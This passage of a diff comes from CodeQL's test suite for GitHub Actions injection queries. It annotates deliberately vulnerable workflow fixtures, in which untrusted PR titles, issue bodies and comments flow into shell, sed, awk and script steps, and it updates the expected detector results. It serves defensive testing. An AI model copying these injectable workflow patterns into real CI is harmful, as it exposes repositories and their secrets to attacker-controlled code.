"s/FOO/$TITLE/g" > bar\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:25:14:27:58 | # VULNERABLE\necho $(echo "foo" \| sed "s/FOO/$TITLE/g" > bar)\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:28:14:30:31 | # VULNERABLE\nawk "BEGIN {$TITLE}"\n | awk | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:31:14:33:84 | # VULNERABLE\nsed -i "s/git_branch = .*/git_branch = \\"$GITHUB_HEAD_REF\\"/" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:34:14:36:84 | # VULNERABLE\nsed -i "s\|git_branch = .*\|git_branch = \\"$GITHUB_HEAD_REF\\"\|" config.json\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:37:14:42:111 | # VULNERABLE\nsed -e 's##${TITLE}#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##TITLE#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:43:14:48:111 | # VULNERABLE\nsed -e 's##TITLE#' \\\n -e 's##${{ env.sot_repo }}#' \\\n -e 's##${TITLE}#' \\\n .github/workflows/common-copybara.bara.sky.template > .github/workflows/common-copybara.bara.sky\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:49:14:52:41 | # VULNERABLE\nBODY=$(git log --format=%s)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:53:14:56:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | -| .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | Potential argument injection in $@ command, which may be controlled by an external user ($@). | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | sed | .github/workflows/arg_injection.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref index a2f6e1c12b9..3475e69cd3a 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionCritical.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionCritical.ql +query: experimental/Security/CWE-088/ArgumentInjectionCritical.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected index 12171d8c7f2..981e5b86549 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.expected @@ -1,3 +1,4 @@ +#select edges | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:19:14:21:31 | # VULNERABLE\nsed "s/FOO/$TITLE/g"\n | provenance | Config | | .github/workflows/arg_injection.yml:10:15:10:50 | github.event.pull_request.title | .github/workflows/arg_injection.yml:22:14:24:50 | # VULNERABLE\necho "foo" \| sed "s/FOO/$TITLE/g" > bar\n | provenance | Config | @@ -20,4 +21,3 @@ nodes | .github/workflows/arg_injection.yml:57:14:60:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD )\nsed "s/FOO/$BODY/g" > /tmp/foo\n | | .github/workflows/arg_injection.yml:61:14:64:41 | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | semmle.label | # VULNERABLE\nBODY=$(git diff --name-only HEAD^ \| xargs)\nsed "s/FOO/$BODY/g" > /tmp/foo\n | subpaths -#select diff --git a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref index b96467552c5..3aa94b52965 100644 --- a/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref +++ b/actions/ql/test/query-tests/Security/CWE-088/ArgumentInjectionMedium.qlref @@ -1 +1,2 @@ -experimental/Security/CWE-088/ArgumentInjectionMedium.ql +query: experimental/Security/CWE-088/ArgumentInjectionMedium.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml index ba7d3eec1af..bed01ffea54 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action1/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml index 510ad86cbfa..f4a9d457452 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action3/action.yml @@ -6,4 +6,4 @@ runs: - shell: bash env: FOO: ${{ secrets.FOO}} - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml index ba7d3eec1af..6c63aa58afa 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action4/action.yml @@ -4,4 +4,4 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.pull_request.body }}' + run: echo '${{ github.event.pull_request.body }}' # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml index 53a2e0c87e2..75a02958a99 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action5/action.yml @@ -16,7 +16,7 @@ runs: using: 'composite' steps: - shell: bash - run: echo '${{ github.event.issue.body }}' + run: echo '${{ github.event.issue.body }}' # $ Alert[actions/code-injection/critical] - name: Step id: step env: @@ -25,10 +25,10 @@ runs: run: echo "result=$(echo $FOO)" >> $GITHUB_OUTPUT - id: step2 env: - FOO2: ${{ github.event.issue.body }} + FOO2: ${{ github.event.issue.body }} # $ Source[actions/code-injection/critical] shell: bash run: echo "result2=$(echo $FOO2)" >> $GITHUB_OUTPUT - name: Sink id: sink shell: bash - run: echo "${{ inputs.taint }}" + run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml index 0048a4ca31e..25b58d07466 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action6/action.yml @@ -213,7 +213,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml index 8bffcdc4020..0a37ade5da6 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/action7/action.yml @@ -74,7 +74,7 @@ runs: # pip install -q git+https://github.com/ultralytics/actions@main codespell tomli run: | packages="ultralytics-actions" - if [ "${{ inputs.spelling }}" = "true" ]; then + if [ "${{ inputs.spelling }}" = "true" ]; then # $ Alert[actions/code-injection/medium] packages="$packages codespell tomli" fi @@ -211,10 +211,10 @@ runs: - name: Commit and Push Changes if: (github.event_name == 'pull_request' || github.event_name == 'pull_request_target') && github.event.action != 'closed' run: | - git config --global user.name "${{ inputs.github_username }}" - git config --global user.email "${{ inputs.github_email }}" + git config --global user.name "${{ inputs.github_username }}" # $ Alert[actions/code-injection/medium] + git config --global user.email "${{ inputs.github_email }}" # $ Alert[actions/code-injection/medium] # this action is not called in the test - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/medium] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml index 398c0ee6a6e..cd9dcaf1a0b 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml @@ -19,7 +19,7 @@ runs: using: composite steps: - shell: bash - run: echo "${{ inputs.title }}" + run: echo "${{ inputs.title }}" # $ Alert[actions/code-injection/critical] - uses: frabert/replace-string-action@v2.5 id: out with: diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml index a8019fbbf14..85decb59932 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/actions/external/ultralytics/actions/action.yaml @@ -93,7 +93,7 @@ runs: shell: bash - shell: bash run: | - echo "${{ inputs.body }}" + echo "${{ inputs.body }}" # $ Alert[actions/code-injection/critical] # Checkout Repository ---------------------------------------------------------------------------------------------- - name: Checkout Repository @@ -220,7 +220,7 @@ runs: run: | git config --global user.name "${{ inputs.github_username }}" git config --global user.email "${{ inputs.github_email }}" - git pull origin ${{ github.head_ref || github.ref }} + git pull origin ${{ github.head_ref || github.ref }} # $ Alert[actions/code-injection/critical] git add . git reset HEAD -- .github/workflows/ # workflow changes are not permitted with default token if ! git diff --staged --quiet; then diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml index 7b9c5735488..301be58e2e8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/argus_case_study.yml @@ -14,7 +14,7 @@ jobs: - uses: actions/checkout@v2 - name: Remove conflicting chars env: - ISSUE_TITLE: ${{github.event.issue.title}} + ISSUE_TITLE: ${{github.event.issue.title}} # $ Source[actions/code-injection/critical] uses: frabert/replace-string-action@1.2 id: remove_quotations with: @@ -24,6 +24,6 @@ jobs: - name: Check info id: check-info run: | - echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV + echo "foo $(pwsh bar ${{steps.remove_quotations.outputs.replaced}}) " >> $GITHUB_ENV # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml index 5cf7bbd4e6b..c4add3b215e 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning1.yml @@ -17,12 +17,12 @@ jobs: workflow: ${{ github.event.workflow_run.workflow_id }} name: pr - - name: save PR id + - name: save PR id # $ Source[actions/code-injection/critical] id: pr run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - - run: echo ${{ steps.prepare.outputs.pr }} + - run: echo ${{ steps.prepare.outputs.pr }} # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml index 63acdc612b0..2d1acd97b2d 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/artifactpoisoning4.yml @@ -14,9 +14,9 @@ jobs: name: artifact # Save PR id to output - - name: Save artifact data + - name: Save artifact data # $ Source[actions/code-injection/critical] id: artifact run: echo "::set-output name=id::$(> $GITHUB_ENV + echo "destination_branch=$(pwsh .\\.github\\scripts\\cherry_pick_check.ps1 "${{ env.ISSUE_BODY_PARSED }}" )" >> $GITHUB_ENV # $ Alert[actions/code-injection/medium] #If a target branch was found will run the action - if: env.destination_branch != 'invalid' @@ -50,7 +50,7 @@ jobs: git checkout -b ${{env.auto_branch}} origin/${{env.destination_branch}} git cherry-pick -x ${{github.event.after}} --strategy-option theirs git push -u origin ${{env.auto_branch}} - hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" + hub pull-request -b "${{env.destination_branch}}" -h "${{env.auto_branch}}" -m "${{env.pr_message}}" # $ Alert[actions/code-injection/medium] env: #Token used for the pull request. Corresponds to the DynamoBot account GITHUB_TOKEN: ${{secrets.DYNAMOBOTTOKEN}} diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml index fdb140ec380..d07398ebca7 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion.yml @@ -4,5 +4,5 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml index 649d3a6e131..5cdf5c0bf62 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/discussion_comment.yml @@ -4,6 +4,6 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.discussion.title }}' - - run: echo '${{ github.event.discussion.body }}' - - run: echo '${{ github.event.comment.body }}' \ No newline at end of file + - run: echo '${{ github.event.discussion.title }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.discussion.body }}' # $ Alert[actions/code-injection/critical] + - run: echo '${{ github.event.comment.body }}' # $ Alert[actions/code-injection/critical] \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml index b4c2ecaec70..0da70f8e2d4 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml @@ -81,7 +81,7 @@ jobs: git push \ "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \ - 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' + 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}' # $ Alert[actions/code-injection/critical] Source[actions/code-injection/critical] env: BOT_PA_TOKEN: ${{ secrets.githubBotPAT }} @@ -91,4 +91,4 @@ jobs: with: github-token: ${{ secrets.githubBotPAT }} script: | - const fileList = `${{ steps.git-commit.outputs.file-list }}` + const fileList = `${{ steps.git-commit.outputs.file-list }}` # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml index 0c4aa93c7a5..333af0376ca 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml @@ -33,7 +33,7 @@ jobs: next_version: next link: '[#${{ github.event.number }}](https://github.com/fabricjs/fabric.js/pull/${{ github.event.number }})' steps: - - run: echo "${{ inputs.taint }}" + - run: echo "${{ inputs.taint }}" # $ Alert[actions/code-injection/critical] - uses: actions/checkout@v3 with: ref: ${{ github.event.pull_request.head.ref }} @@ -41,8 +41,8 @@ jobs: id: update uses: actions/github-script@v6 env: - log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' - prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' + log: '- ${{ github.event.pull_request.title }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] + prev_log: '- ${{ github.event.changes.title.from }} ${{ env.link }}\n' # $ Source[actions/code-injection/critical] with: result-encoding: string script: | @@ -50,7 +50,7 @@ jobs: const file = './${{ env.file }}'; let content = fs.readFileSync(file).toString(); const title = '[${{ env.next_version }}]'; - const log = '${{ env.log }}'; + const log = '${{ env.log }}'; # $ Alert[actions/code-injection/critical] let exists = ${{ needs.changelog.result == 'success' }}; if (!content.includes(title)) { @@ -63,7 +63,7 @@ jobs: const insertAt = content.indexOf('\n', content.indexOf(title) + title.length + 1) + 1; if (exists && ${{ github.event.action == 'edited' }}) { - const prevLog = '${{ env.prev_log }}'; + const prevLog = '${{ env.prev_log }}'; # $ Alert[actions/code-injection/critical] const index = content.indexOf(prevLog, insertAt); if (index > -1) { content = content.slice(0, index) + content.slice(index + prevLog.length); diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml index a952c8c1ab8..38a6bcbd6af 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/gollum.yml @@ -4,8 +4,8 @@ jobs: echo-chamber: runs-on: ubuntu-latest steps: - - run: echo '${{ github.event.pages[1].title }}' - - run: echo '${{ github.event.pages[11].title }}' - - run: echo '${{ github.event.pages[0].page_name }}' - - run: echo '${{ github.event.pages[2222].page_name }}' + - run: echo '${{ github.event.pages[1].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[11].title }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[0].page_name }}' # $ Alert[actions/code-injection/medium] + - run: echo '${{ github.event.pages[2222].page_name }}' # $ Alert[actions/code-injection/medium] - run: echo '${{ toJSON(github.event.pages.*.title) }}' # safe \ No newline at end of file diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml index c8a30dad294..4180c7d6769 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/image_link_generator.yml @@ -15,7 +15,7 @@ jobs: - name: Extract and Clean Initial URL id: extract-url env: - BODY: ${{ github.event.comment.body }} + BODY: ${{ github.event.comment.body }} # $ Source[actions/code-injection/critical] run: | echo "::set-output name=initial_url::$BODY" @@ -34,4 +34,4 @@ jobs: - name: Update Comment with New URL run: | - NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" + NEW_COMMENT_BODY="Use this link to include this asset in your changelog: ${{ steps.trim-url.outputs.trimmed_url }}" # $ Alert[actions/code-injection/critical] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index 1ad46b0f6eb..57df1a28983 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml index 4f149a92041..d32f1f2c1a8 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job1.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -40,4 +40,4 @@ jobs: steps: - id: sink - run: echo ${{needs.job1.outputs.job_output}} + run: echo ${{needs.job1.outputs.job_output}} # $ Alert[actions/code-injection/medium] diff --git a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml index 21fa789d9e7..4d838b0d465 100644 --- a/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml +++ b/actions/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job2.yml @@ -23,7 +23,7 @@ jobs: id: source uses: tj-actions/changed-files@v40 - - name: Remove foo from changed files + - name: Remove foo from changed files # $ Source[actions/code-injection/medium] id: step uses: mad9000/actions-find-and-replace-string@3 with: @@ -42,4 +42,4 @@ jobs: steps: - id: sink - run: echo 